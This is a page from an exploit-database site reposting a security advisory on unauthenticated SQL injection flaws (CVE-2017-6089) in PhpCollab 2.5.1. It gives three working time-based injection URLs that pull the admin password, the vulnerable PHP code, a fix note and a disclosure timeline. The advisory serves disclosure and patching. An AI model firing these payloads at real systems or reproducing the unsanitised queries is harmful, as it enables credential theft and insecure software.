0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
PhpCollab 2.5.1 SQL Injection Vulnerability
Author
Risk
![](/img/risk/critlow_3.gif)
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated) ## Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. ## SQL injections The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user. **CVE ID**: CVE-2017-6089 **Access Vector**: remote **Security Risk**: Critical **Vulnerability**: CWE-89 **CVSS Base Score**: 10 (Critical) **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H ## Proof of Concept 1 The following HTTP request allows an attacker to extract data using SQL injections in either the `project` or `id` parameter (it requires at least one topic): ``` http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2 http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)) ``` ### Vulnerable code The vulnerable code is found in `topics/deletetopics.php`, line 9. ``` if ($action == "delete") { $id = str_replace("**",",",$id); $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id"; $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id"; $pieces = explode(",",$id); $num = count($pieces); connectSql("$tmpquery1"); connectSql("$tmpquery2"); ``` ## Proof of Concept 2 The following HTTP request allows an attacker to extract data using SQL injections in the `id` parameter (it requires at least one saved bookmark): ``` http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116) ``` ### Vulnerable code The vulnerable code is found in `bookmarks/deletebookmarks.php`, line 32. ``` if ($action == "delete") { $id = str_replace("**",",",$id); $tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)"; connectSql("$tmpquery1"); ``` ## Proof of Concept 3 The following HTTP request allows an attacker to extract some information using SQL injection in the `id` parameter (it requires at least one calendar entry): ``` http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116) ``` ### Vulnerable code The vulnerable code is found in `calendar/deletecalendar.php`, line 31. ``` if ($action == "delete") { $id = str_replace("**",",",$id); $tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)"; connectSql("$tmpquery1"); ``` **Notes** The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters. ## Solution Update to the latest version avalaible. ## Affected versions * Version <= 2.5.1 ## Timeline (dd/mm/yyyy) * 27/08/2016 : Initial discovery. * 05/10/2016 : Initial contact. * 11/10/2016 : GPG Key exchange. * 19/10/2016 : Advisory sent to vendor. * 13/02/2017 : First fixes. * 15/02/2017 : Fixes validation by Sysdream. * 21/02/2017 : PhpCollab ask to wait before publish. * 21/06/2017 : New version has been released. * 29/09/2017 : Public disclosure. # 0day.today [2024-07-07] #